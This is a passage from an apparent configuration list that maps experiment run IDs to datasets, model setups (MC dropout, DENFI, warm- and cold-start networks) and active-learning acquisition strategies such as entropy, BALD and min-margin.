\"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"6245ed7d8716941057c12d31\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"624606478716941057c12d32\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6245d4b68716941057c12d30\", \"Tweet_emotion_detection\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"6249f1e48f5267837b16b4f0\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624baa128f5267837b16b4f1\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624f28338f5267837b16b4f3\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"6250b0d58f5267837b16b4f4\", \"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d45e88f5267837b16b4f2\", 
\"Tweet_emotion_detection\", \"denfi_20_step_50_iters\", \"random\"],\n [\"6258b3f7d7f2411f6d3df292\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625912cdd7f2411f6d3df293\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625969c0d7f2411f6d3df295\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625996e9d7f2411f6d3df296\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"62593cc6d7f2411f6d3df294\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"62624e57c0d83a69a354bc4b\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"625e31bd8ece41572e440e1f\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"625ec67c8ece41572e440e20\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"625f458d8ece41572e440e22\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625f78e38ece41572e440e23\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"625f114c8ece41572e440e21\", \"Tweet_emotion_detection\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"62590b05096fc9f74a546de4\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"6259bc6b096fc9f74a546de5\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625a42a8096fc9f74a546de7\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625a7477096fc9f74a546de8\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625a07c5096fc9f74a546de6\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62b0574a038c49ce149b8594\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62b03d57038c49ce149b8593\", \"Tweet_emotion_detection\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8b8ee468e0388210f239d\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a877a1468e0388210f239c\", \"Tweet_emotion_detection\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a4102d68f6ed5a8557a361\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a37a6768f6ed5a8557a360\", \"Tweet_emotion_detection\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62abf28fcd24307315918227\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aac4d6cd24307315918226\", \"Tweet_emotion_detection\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"62442f786d577d72f4c9cb3f\", \"Gibberish\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"624444db6d577d72f4c9cb40\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"624459176d577d72f4c9cb41\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"624469106d577d72f4c9cb43\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"624471c26d577d72f4c9cb44\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"624460f96d577d72f4c9cb42\", \"Gibberish\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625bdc04c24175962261e1f7\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625bf4a8c24175962261e1f8\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n 
[\"625c076fc24175962261e1fa\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625c10e3c24175962261e1fb\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625bfe13c24175962261e1f9\", \"Gibberish\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6251b7e852c1e4b7dbf2c088\", \"Gibberish\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"6251e42552c1e4b7dbf2c089\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"62520fd352c1e4b7dbf2c08a\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6252340d52c1e4b7dbf2c08c\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"6252461b52c1e4b7dbf2c08d\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6252225a52c1e4b7dbf2c08b\", \"Gibberish\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625bedd574f4631926b7a097\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625c17d574f4631926b7a098\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625c36d874f4631926b7a09a\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625c464e74f4631926b7a09b\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625c275674f4631926b7a099\", \"Gibberish\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624357f1eed21de5abc21a47\", \"Gibberish\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"62421662d4099c6fb6d2defd\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"62425696d4099c6fb6d2defe\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"62428dc9d4099c6fb6d2df00\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6242adb3d4099c6fb6d2df01\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"62427215d4099c6fb6d2deff\", \"Gibberish\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"625b01f4545ec1d0d14d9c93\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625b4963545ec1d0d14d9c94\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625b7e00545ec1d0d14d9c96\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625b9844545ec1d0d14d9c97\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"625b63ac545ec1d0d14d9c95\", \"Gibberish\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6253589525deac12f81105b6\", \"Gibberish\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"625409e125deac12f81105b7\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"6254c3a825deac12f81105b8\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"62556dd825deac12f81105ba\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"6255cd7b25deac12f81105bb\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"625511c925deac12f81105b9\", \"Gibberish\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625b45d2c86c08c674ae48d7\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625bc540c86c08c674ae48d8\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625c5a32c86c08c674ae48da\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625c926fc86c08c674ae48db\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625c177ec86c08c674ae48d9\", \"Gibberish\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62ae0c73667a85ff7d1d61b5\", \"Gibberish\", 
\"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62adec61667a85ff7d1d61b4\", \"Gibberish\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8b79e9e598b9074d3d71a\", \"Gibberish\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a877199e598b9074d3d719\", \"Gibberish\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a6726c8a92b7bfcc6e8f3e\", \"Gibberish\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a5fb518a92b7bfcc6e8f3d\", \"Gibberish\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62abebbd71cf023197c7a0c7\", \"Gibberish\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aabf8671cf023197c7a0c6\", \"Gibberish\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"62442f002f3c8041223f43d5\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"624444ee2f3c8041223f43d6\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"62445a892f3c8041223f43d7\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"62446a5c2f3c8041223f43d9\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"624473162f3c8041223f43da\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"624462752f3c8041223f43d8\", \"Amazon Review 3, 5\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"6257e949d84f0f0020d555f5\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625801b9d84f0f0020d555f6\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625812efd84f0f0020d555f8\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"62581b92d84f0f0020d555f9\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"62580a44d84f0f0020d555f7\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"62520153b8254c1daff50da9\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"62522e29b8254c1daff50daa\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"625257fab8254c1daff50dab\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"625276ebb8254c1daff50dad\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"6252867ab8254c1daff50dae\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6252676bb8254c1daff50dac\", \"Amazon Review 3, 5\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625794b2aaec99543b94fe28\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"6257c170aaec99543b94fe29\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"6257fb65e99cc6b47d2d09b3\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"62584f70e99cc6b47d2d09b7\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625832a4e99cc6b47d2d09b5\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624358bab320121da6e21314\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624217f136633ec11e03cb67\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624259b736633ec11e03cb68\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"624290c636633ec11e03cb6a\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6242b17c36633ec11e03cb6b\", \"Amazon Review 3, 5\", 
\"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6242753136633ec11e03cb69\", \"Amazon Review 3, 5\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"624b855e698214ee3d0ca7fd\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624c922f698214ee3d0ca7fe\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624e4d03698214ee3d0ca800\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"624f363c698214ee3d0ca801\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d56c5698214ee3d0ca7ff\", \"Amazon Review 3, 5\", \"denfi_20_step_50_iters\", \"random\"],\n [\"624c2233dee2c2fdc2e880b9\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"624c5d31dee2c2fdc2e880ba\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"624c6bbbdee2c2fdc2e880bc\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"624c7306dee2c2fdc2e880bd\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"624c6478dee2c2fdc2e880bb\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6255f8de0f37c55260d47b05\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"6258833ccd211ead437e7f02\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"62593d91cd211ead437e7f03\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"6259dd44cd211ead437e7f05\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625a250dcd211ead437e7f06\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6259935acd211ead437e7f04\", \"Amazon Review 3, 5\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625881458e9230fdf1ade53b\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"6259399c8e9230fdf1ade53c\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"6259d8a88e9230fdf1ade53e\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625a20d68e9230fdf1ade53f\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"62598efb8e9230fdf1ade53d\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62ac6e147420eb1f9cbcf13a\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62ac4dc07420eb1f9cbcf139\", \"Amazon Review 3, 5\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62b74a8885f0fadccffe04d4\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62b7189e85f0fadccffe04d3\", \"Amazon Review 3, 5\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a408e3e3d593c4739b804e\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a375e2e3d593c4739b804d\", \"Amazon Review 3, 5\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ae27e0e1df8d304af2a977\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62ad31a4e1df8d304af2a976\", \"Amazon Review 3, 5\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"6246d66149d95ab971503607\", \"Fake news detection\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6246de6f49d95ab971503608\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6246e69949d95ab971503609\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n 
[\"6246f23049d95ab97150360b\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6246f7f049d95ab97150360c\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6246ec6449d95ab97150360a\", \"Fake news detection\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"625d20dfcc6a567f475264e0\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"625d2dc7cc6a567f475264e1\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"625d3edccc6a567f475264e3\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"625d477acc6a567f475264e4\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"625d3651cc6a567f475264e2\", \"Fake news detection\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6253209b0d4215a7e77b6037\", \"Fake news detection\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"625337300d4215a7e77b6038\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"62534deb0d4215a7e77b6039\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"62536fe50d4215a7e77b603b\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"625380cc0d4215a7e77b603c\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"62535f000d4215a7e77b603a\", \"Fake news detection\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625d2a4747ea60bfee10a84d\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625d404947ea60bfee10a84e\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625d5cdf47ea60bfee10a850\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625d6a9847ea60bfee10a851\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625d4f1147ea60bfee10a84f\", \"Fake news detection\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624748f500157501d9f0f291\", \"Fake news detection\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624765e100157501d9f0f292\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624782ba00157501d9f0f293\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"6247afd200157501d9f0f295\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"6247c67e00157501d9f0f296\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"6247992f00157501d9f0f294\", \"Fake news detection\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"6249fc7d12e53fdf9a7ca053\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"hac_entropy\"],\n [\"624baa19437c8c4caa414612\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"hac_bald\"],\n [\"624f50bf437c8c4caa414614\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"entropy\"],\n [\"6250e2c5437c8c4caa414615\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"bald\"],\n [\"624d5a2d437c8c4caa414613\", \"Fake news detection\", \"denfi_20_step_50_iters\", \"random\"],\n [\"625d461a6881ae9fd6f26bcc\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"625d6f446881ae9fd6f26bcd\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"625dad256881ae9fd6f26bcf\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"625dd4a96881ae9fd6f26bd0\", \"Fake news detection\", 
\"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"625d88426881ae9fd6f26bce\", \"Fake news detection\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"6254b3890d90e3d52f546234\", \"Fake news detection\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"62550b880d90e3d52f546235\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"625571360d90e3d52f546236\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"62560eb20d90e3d52f546238\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"625655790d90e3d52f546239\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6255c6c60d90e3d52f546237\", \"Fake news detection\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625c22dc7ce437e78a7a2f66\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625c6a6a7ce437e78a7a2f67\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625cc7347ce437e78a7a2f69\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625cf4a27ce437e78a7a2f6a\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625c9ad97ce437e78a7a2f68\", \"Fake news detection\", \"nn_10_step_100_iters_warm_start\", \"random\"],\n #\n [\"62b05d78dfc4f444714b908c\", \"Fake news detection\", \"nn_100_step_10_iters_cold_start\", \"entropy\"],\n [\"62b041d1dfc4f444714b908b\", \"Fake news detection\", \"nn_100_step_10_iters_cold_start\", \"random\"],\n [\"62a8c06a4d78e3e756856b70\", \"Fake news detection\", \"nn_50_step_20_iters_cold_start\", \"entropy\"],\n [\"62a87d8d4d78e3e756856b6f\", \"Fake news detection\", \"nn_50_step_20_iters_cold_start\", \"random\"],\n [\"62a687334412584231d1dfff\", \"Fake news detection\", \"nn_20_step_50_iters_cold_start\", \"entropy\"],\n [\"62a605bc4412584231d1dffe\", \"Fake news detection\", \"nn_20_step_50_iters_cold_start\", \"random\"],\n [\"62ac07e25de9c35d5d1e9794\", \"Fake news detection\", \"nn_10_step_100_iters_cold_start\", \"entropy\"],\n [\"62aad2e65de9c35d5d1e9793\", \"Fake news detection\", \"nn_10_step_100_iters_cold_start\", \"random\"],\n #\n [\"6256af3008ad855bbecc3c09\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters\", \"min_margin\"],\n [\"6256c3d208ad855bbecc3c0a\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"hac_entropy\"],\n [\"6256d9fc08ad855bbecc3c0b\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"hac_bald\"],\n [\"6256e9fc08ad855bbecc3c0d\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"entropy\"],\n [\"6256f21508ad855bbecc3c0e\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"bald\"],\n [\"6256e21808ad855bbecc3c0c\", \"Amazon Review 1, 5\", \"mc_dropout_100_step_10_iters\", \"random\"],\n [\"624d511ed7293ac5a8902085\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_entropy\"],\n [\"624d6316d7293ac5a8902086\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"hac_bald\"],\n [\"624d66bbd7293ac5a8902088\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"entropy\"],\n [\"624d688dd7293ac5a8902089\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"bald\"],\n [\"624d64e9d7293ac5a8902087\", \"Amazon Review 1, 5\", \"nn_100_step_10_iters_warm_start\", \"random\"],\n [\"6256dce5f692a6acb3e2fbab\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters\", \"min_margin\"],\n [\"62576c60f692a6acb3e2fbac\", \"Amazon Review 1, 5\", 
\"mc_dropout_50_step_20_iters\", \"hac_entropy\"],\n [\"625798baf692a6acb3e2fbad\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"hac_bald\"],\n [\"6257bbccf692a6acb3e2fbaf\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"entropy\"],\n [\"625e763b5b32a8c1e69248ae\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"bald\"],\n [\"6257aa29f692a6acb3e2fbae\", \"Amazon Review 1, 5\", \"mc_dropout_50_step_20_iters\", \"random\"],\n [\"625dbb84091e4e88de538de2\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_entropy\"],\n [\"625de514091e4e88de538de3\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"hac_bald\"],\n [\"625e0282091e4e88de538de5\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"entropy\"],\n [\"625e112d091e4e88de538de6\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"bald\"],\n [\"625df3c0091e4e88de538de4\", \"Amazon Review 1, 5\", \"nn_50_step_20_iters_warm_start\", \"random\"],\n [\"624ec21df75a7d0e7ea688f2\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters\", \"min_margin\"],\n [\"624f26a2f75a7d0e7ea688f3\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"hac_entropy\"],\n [\"624f7eeef75a7d0e7ea688f4\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"hac_bald\"],\n [\"624fcc18f75a7d0e7ea688f6\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"entropy\"],\n [\"624ff437f75a7d0e7ea688f7\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"bald\"],\n [\"624fa573f75a7d0e7ea688f5\", \"Amazon Review 1, 5\", \"mc_dropout_20_step_50_iters\", \"random\"],\n [\"625022c9a32053a44087a896\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_entropy\"],\n [\"6250570aa32053a44087a897\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"hac_bald\"],\n [\"6250650fa32053a44087a899\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"entropy\"],\n [\"62506ca5a32053a44087a89a\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"bald\"],\n [\"62505d7da32053a44087a898\", \"Amazon Review 1, 5\", \"nn_20_step_50_iters_warm_start\", \"random\"],\n [\"625221b75e616ca40bb9658e\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters\", \"min_margin\"],\n [\"6252c9ad5e616ca40bb9658f\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"hac_entropy\"],\n [\"62538ade5e616ca40bb96590\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"hac_bald\"],\n [\"625437325e616ca40bb96592\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"entropy\"],\n [\"6254948a5e616ca40bb96593\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"bald\"],\n [\"6253da4c5e616ca40bb96591\", \"Amazon Review 1, 5\", \"mc_dropout_10_step_100_iters\", \"random\"],\n [\"625db7c365e41edab31635bc\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_entropy\"],\n [\"625e4d4865e41edab31635bd\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"hac_bald\"],\n [\"625ed86f65e41edab31635bf\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"entropy\"],\n [\"625f1d3965e41edab31635c0\", \"Amazon Review 1, 5\", \"nn_10_step_100_iters_warm_start\", \"bald\"],\n [\"625e903e65e41edab31635be\", \"Amazon Review 1, 5\", 